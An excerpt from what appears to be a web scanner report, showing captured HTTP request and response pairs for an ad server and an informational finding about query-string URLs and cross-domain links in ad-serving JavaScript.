GET /ads/?t=i&f=j&p=4703&pl=fa517122&rnd=8714839140884578&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUabUl55ctWfbz4_8QgoT4EM3BowwDA3gBY2BgYGJg2u7OwOqZzMBoHsLA8MuMgYGBk4GB0aBj17NXDEwZjxhYnv5iYFRbxcBwLx8mJ3NDdTmQDQa.X4MZGLgYGOQrGWUYGRhYNjCKAikGA0YGIJU.FSyoeIKRG8hbvhQst84DTEktYeQHCi46B1a5rJ5REMgD2_saYjIANIEckg--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVB4zM_Ou.qtt.rjIgldJ4nRzCJgDA3gBY2BgYGZgmv6DgdVtBQOj3moGhk.fGRgYOBkYGA06dv3kZGDa7s7A6pnMwGgewsDwywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kg4Hv12AGBi4GBvlKRhlGBgaWDYyiQIrBgJEBSKVPBQsqnmDkBvKWLwXLrfMAU1JLGPmBgovOgVUuq2cUBPLAbgKaBgIARjIjhg--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:20:12 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2160
Date: Mon, 13 Jun 2011 11:20:11 GMT

_345768_amg_acamp_id=169976;
_345768_amg_pcamp_id=77483;
_345768_amg_location_id=62195;
_345768_amg_creative_id=345768;
_345768_amg_loaded=true;
var _amg_345768_content='<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1314067228?">\n'+
'</SCRIPT>\n'+
'<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77483&c5=169976&c6=&cv=1.3&cj=1&rn=161104420" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_345768_content);

18.8. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=b25d4a18&rnd=93325898563489310&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUHGv6vSfNebFfisyTr.pAYyHnTllnZW8sdXNhLHQsMTMwNzk2NjQ3MjQ3NyxjLDM1MzQ1NixwYyw4MDQ1NixhYywxNzYwMzIsbyxOMC1TMCxsLDY0OTM2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1hJX0M5U2hjX3o5Y2o4TDFLRnpfUHdBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRS0Rua1poTlVQZGdfYXlER292QmR5OEZfUFZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCdFB3WUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0F6QzFnQUlnOEJBZ1VDQVFRQUFBQUFjeUxrY0FBQUFBQS4vY25kPSEwZ1d1TVFqbi1nUVE3ZjRZR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIwcU9mQmZ6MVRiU3pCYXJ0bFFmUW9fanBDZGZxLU5NQmw2R1U3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ2pNd01IZ3lOVEJmWVhQSUFRbmFBU0JvZEhSd09pOHZkM2QzTG5SM1lXTnJiR1V1WTI5dEwyaGxZV1JzYVc1bGM1Z0NxQV9BQWdUSUFvWFN6d3FvQXdIb0E0Z0M2QU8xQ1BVREFBQUF3SUFHMGJHWm1vcVRqZVJCJm51bT0xJnNpZz1BR2lXcXR5ajllUkdSbGsyVllITEtjd3NjX0FOQzBKdU1BJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUAdiVfk7836FQlS6cCc68tAbj5NNnZW8sdXNhLHQsMTMwNzk2NjQ3MzczNyxjLDM1MzA2MixwYyw3OTk5NSxhYywxNzUyMTIsbyxOMC1TMCxsLDY0NTE4LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVIR3Y2dlNmTmViRmZpc3lUci5wQVl5SG5UbGxuWlc4c2RYTmhMSFFzTVRNd056azJOalEzTWpRM055eGpMRE0xTXpRMU5peHdZeXc0TURRMU5peGhZeXd4TnpZd016SXNieXhPTUMxVE1DeHNMRFkwT1RNMkxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFoSlgwTTVVMmhqWDNvNVkybzRUREZMUm5wZlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzBSdWExcG9UbFZRWkdkZllYbEVSMjkyUW1SNU9FWmZVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDZEZCM1dVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVsbk9FSkJaMVZEUVZGUlFVRkJRVUZqZVV4clkwRkJRVUZCUVM0dlkyNWtQU0V3WjFkMVRWRnFiaTFuVVZFM1pqUlpSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSXdjVTltUW1aNk1WUmlVM3BDWVhKMGJGRm1VVzlmYW5CRFpHWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTnhRVjlCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFVOHhRMUJWUkVGQlFVRjNTVUZITUdKSFdtMXZjVlJxWlZKQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNWFqbGxVa2RTYkdzeVZsbElURXRqZDNOalgwRk9RekJLZFUxQkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1686381690?
http://ad.doubleclick.net/adj/N6090.218.9105273493621/B5528573.7;abr=!ie;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUAdiVfk7836FQlS6cCc68tAbj5NNnZW8sdXNhLHQsMTMwNzk2NjQ3MzczNyxjLDM1MzA2MixwYyw3OTk5NSxhYywxNzUyMTIsbyxOMC1TMCxsLDY0NTE4LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVIR3Y2dlNmTmViRmZpc3lUci5wQVl5SG5UbGxuWlc4c2RYTmhMSFFzTVRNd056azJOalEzTWpRM055eGpMRE0xTXpRMU5peHdZeXc0TURRMU5peGhZeXd4TnpZd016SXNieXhPTUMxVE1DeHNMRFkwT1RNMkxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFoSlgwTTVVMmhqWDNvNVkybzRUREZMUm5wZlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzBSdWExcG9UbFZRWkdkZllYbEVSMjkyUW1SNU9FWmZVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDZEZCM1dVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVsbk9FSkJaMVZEUVZGUlFVRkJRVUZqZVV4clkwRkJRVUZCUVM0dlkyNWtQU0V3WjFkMVRWRnFiaTFuVVZFM1pqUlpSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSXdjVTltUW1aNk1WUmlVM3BDWVhKMGJGRm1VVzlmYW5CRFpHWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTnhRVjlCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFVOHhRMUJWUkVGQlFVRjNTVUZITUdKSFdtMXZjVlJxWlZKQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNWFqbGxVa2RTYkdzeVZsbElURXRqZDNOalgwRk9RekJLZFUxQkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1686381690?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79995&c5=175212&c6=&cv=1.3&cj=1&rn=316549716

Request

GET /ads/?t=i&f=j&p=4703&pl=b25d4a18&rnd=93325898563489310&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUHGv6vSfNebFfisyTr.pAYyHnTllnZW8sdXNhLHQsMTMwNzk2NjQ3MjQ3NyxjLDM1MzQ1NixwYyw4MDQ1NixhYywxNzYwMzIsbyxOMC1TMCxsLDY0OTM2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1hJX0M5U2hjX3o5Y2o4TDFLRnpfUHdBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRS0Rua1poTlVQZGdfYXlER292QmR5OEZfUFZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCdFB3WUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0F6QzFnQUlnOEJBZ1VDQVFRQUFBQUFjeUxrY0FBQUFBQS4vY25kPSEwZ1d1TVFqbi1nUVE3ZjRZR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIwcU9mQmZ6MVRiU3pCYXJ0bFFmUW9fanBDZGZxLU5NQmw2R1U3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ2pNd01IZ3lOVEJmWVhQSUFRbmFBU0JvZEhSd09pOHZkM2QzTG5SM1lXTnJiR1V1WTI5dEwyaGxZV1JzYVc1bGM1Z0NxQV9BQWdUSUFvWFN6d3FvQXdIb0E0Z0M2QU8xQ1BVREFBQUF3SUFHMGJHWm1vcVRqZVJCJm51bT0xJnNpZz1BR2lXcXR5ajllUkdSbGsyVllITEtjd3NjX0FOQzBKdU1BJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468285&bpp=5&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966468319&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=80&xpc=GEVMBFEjsI&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUzfNFx6EKoH0gDtVC2UpsGwKSFdQDA3gBdZHNK4RRFMZ_5zav0pAUG01pFiwUZkURdj4WbIy_YBRW1hbIRmKlSNn4yBhRZhYjZWQsZiELC6WUTFKjxoIyFOMjx9t4Z_Wuzr3P7z7neeoCZZjoOtZwDGnrhe8doBQkMHc348OshrD6JpHmecglHXbz1IiJXyhbQNqj8PNaZFk_ZuUTqzuMNMXh5cthl7NLmMMB9QU171h9mlXIu5y6wiwOYXVUIQ0ZeE47LHk.hjm5xepcQ7pSiAkWWSrt7jvKuvsO8trzXXvuaM897Zlzdh59lGrPHu0ZQlo1K99SZA.PmNF7PJk8Ur8L6fF_5ruui.jZuHoTDeWumYm6RvXS_zYIXqidEJ.AJybVOggIJTCybIv.M_GquHEq6IiE7Sf7vfao2ZIKFTcvbLY9LZV6K3zn335.ATPocTM-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUEk5A0_5WrCwJ6Qtep7i7u6pH1UsDA3gBdZHNK4RRFIefc_OKJCk2mpLFWEwNVoiwYyzYGH_BKJSylpDNJFaKlI2PDBPCYqSQsZiFLGYxpZRMUtRYUIZifOSYeN_VrM6957m_e546QDFmewgrUI00jsJnPlAIUjd1EyzA7C5j9e0hTT74Cjts0oVZDGB1jiG105CO2uzq0YuJxJXNIM278P3isFQVZuEDqz2E1ETg.dNmieAc5qBbc36dd6w59fhzSYxfYGZ7sVrKEM8dPCVtFj0fxJxcY7UuIW0xxPgdFkvmzh2mcuf2M.r5pp5h9dxSz7T95.F7oXp2qGcAadBZmXqH3T9gBm7Ju8sg1ZuQHP5nrkv3hp5NzuyRR3eRY.aR26tZul57oAgqR8QlkLcn5VqoE3Rt_fPZZtWZFGlz5VTQshHKPtnxZUvFmpRoczWeZesTUqq3v1X__s8PSf12sw--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 12:01:13 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4021
Date: Mon, 13 Jun 2011 12:01:13 GMT

_353062_amg_acamp_id=175212;
_353062_amg_pcamp_id=79995;
_353062_amg_location_id=64518;
_353062_amg_creative_id=353062;
_353062_amg_loaded=true;
var _amg_353062_content='<IFRAME SRC="http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUAdiVfk7836FQlS6cCc68tAbj5NNnZW8sdXNhLHQsMTMwNzk2NjQ3MzczNyxjLDM1MzA2MixwYyw3OTk5NSxhYywxNzUyMTIsbyxOMC1TMCxsLDY0NTE4LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVIR3Y2dlNmTmViRmZpc3lUci5wQVl5SG5UbGxuWlc4c2RYTmhMSFFzTVRNd056azJOalEzTWpRM055eGpMRE0xTXpRMU5peHdZeXc0TURRMU5peGhZeXd4TnpZd016SXNieXhPTUMxVE1DeHNMRFkwT1RNMkxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFoSlgwTTVVMmhqWDNvNVkybzRUREZMUm5wZlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzBSdWExcG9UbFZRWkdkZllYbEVSMjkyUW1SNU9FWmZVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDZEZCM1dVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVsbk9FSkJaMVZEUVZGUlFVRkJRVUZqZVV4clkwRkJRVUZCUVM0dlkyNWtQU0V3WjFkMVRWRnFiaTFuVVZFM1pqUlpSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSXdjVTltUW1aNk1WUmlVM3BDWVhKMGJGRm1VVzlmYW5CRFpHWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTJwTmQwMUlaM2xPVkVKbVdWaFFTVUZSYm1GQlUwSnZaRWhTZDA5cE9IWmtNMlF6VEc1U00xbFhUbkppUjFWMVdUSTVkRXd5YUd4WlYxSnpZVmMxYkdNMVowTnhRVjlCUVdkVVNVRnZXRk42ZDNGdlFYZEliMEUwWjBNMlFVOHhRMUJWUkVGQlFVRjNTVUZITUdKSFdtMXZjVlJxWlZKQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNWFqbGxVa2RTYkdzeVZsbElURXRqZDNOalgwRk9RekJLZFUxQkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1686381690?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6090.218.9105273493621/B5528573.7;abr=!ie;sz=300x250;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUAdiVfk7836FQlS6cCc68tAbj5NNnZW8sdXNhLHQsMTMwNzk2NjQ3MzczNyxjLDM1MzA2MixwYyw3OTk5NSxhYywxNzUyMTIsbyxOMC1TMCxsLDY0NTE4LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVIR3Y2dlNmTmViRmZpc3lUci5wQVl5SG5UbGxuWlc4c2RYTmhMSFFzTVRNd056azJOalEzTWpRM055eGpMRE0xTXpRMU5peHdZeXc0TURRMU5peGhZeXd4TnpZd016SXNieXhPTUMxVE1DeHNMRFkwT1RNMkxIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFoSlgwTTVVMmhqWDNvNVkybzRUREZMUm5wZlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUzBSdWExcG9UbFZRWkdkZllYbEVSMjkyUW1SNU9FWmZVRlpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDZEZCM1dVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZEZDBJdFowRjZRekZuUVVsbk9FSkJaMVZEUVZGUlFVRkJRVUZqZVV4clkwRkJRVUZCUVM0dlkyNWtQU0V3WjFkMVRWRnFiaTFuVVZFM1pqUlpSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSXdjVTltUW1aNk1WUmlVM3BDWVhKMGJGRm1VVzlmYW5CRFpHWnhMVTVOUW13MlIxVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5l